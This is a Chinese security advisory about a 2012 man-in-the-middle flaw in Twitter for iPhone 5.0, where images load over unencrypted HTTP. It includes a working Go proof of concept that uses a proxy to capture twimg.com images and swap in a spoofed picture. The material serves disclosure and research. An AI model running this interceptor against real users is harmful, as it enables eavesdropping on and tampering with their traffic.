Twitter for iPhone中间人攻击安全漏洞
发布日期:2012-11-23
更新日期:2012-11-28
受影响系统:
Twitter Twitter 5.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56665
Twitter是国外的一个社交网络及微博客服务的网站。它利用无线网络,有线网络,通信技术,进行即时通讯,是微博客的典型应用。
Twitter for iPhone 5.0及其他版本在实现上存在中间人攻击漏洞。Twitter应用通过HTTPS链接与Twitter API进行通信,但是,从*.twimg.com接受图片却没有进行加密,而仅仅通过HTTP进行通信。攻击者可利用此漏洞捕获并修改应用内的图片。
<*来源:Carlos Reventlov
链接:view-source:http://www.mondounix.com/twitter-app-5-0-vulnerable-eavesdropping/
http://reventlov.com/advisories/twitter-app-vulnerable-to-partial-mitm
http://www.securityfocus.com/archive/1/524812/30/0/threaded
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Twitter App, eavesdroping PoC
Written by Carlos Reventlov <[email protected]>
License MIT
*/
package main
import (
"fmt"
"github.com/xiam/hyperfox/proxy"
"github.com/xiam/hyperfox/tools/logger"
"io"
"log"
"os"
"path"
"strconv"
"strings"
)
const imageFile = "spoof.jpg"
func init() {
_, err := os.Stat(imageFile)
if err != nil {
panic(err.Error())
}
}
func replaceAvatar(pr *proxy.ProxyRequest) error {
stat, _ := os.Stat(imageFile)
image, _ := os.Open(imageFile)
host := pr.Response.Request.Host
if strings.HasSuffix(host, "twimg.com") == true {
if pr.Response.ContentLength != 0 {
file := "saved" + proxy.PS + pr.FileName
var ext string
contentType := pr.Response.Header.Get("Content-Type")
switch contentType {
case "image/jpeg":
ext = ".jpg"
case "image/gif":
ext = ".gif"
case "image/png":
ext = ".png"
case "image/tiff":
ext = ".tiff"
}
if ext != "" {
fmt.Printf("** Saving image.\n")
os.MkdirAll(path.Dir(file), os.ModeDir|os.FileMode(0755))
fp, _ := os.Create(file)
if fp == nil {
fmt.Errorf(fmt.Sprintf("Could not open file %s for writing.", file))
}
io.Copy(fp, pr.Response.Body)
fp.Close()
pr.Response.Body.Close()
}
}
fmt.Printf("** Sending bogus image.\n")
pr.Response.ContentLength = stat.Size()
pr.Response.Header.Set("Content-Type", "image/jpeg")
pr.Response.Header.Set("Content-Length",
strconv.Itoa(int(pr.Response.ContentLength)))
pr.Response.Body = image
}
return nil
}
func main() {
p := proxy.New()
p.AddDirector(logger.Client(os.Stdout))
p.AddInterceptor(replaceAvatar)
p.AddLogger(logger.Server(os.Stdout))
var err error
err = p.Start()
if err != nil {
log.Printf(fmt.Sprintf("Failed to bind: %s.\n", err.Error()))
}
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Twitter
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: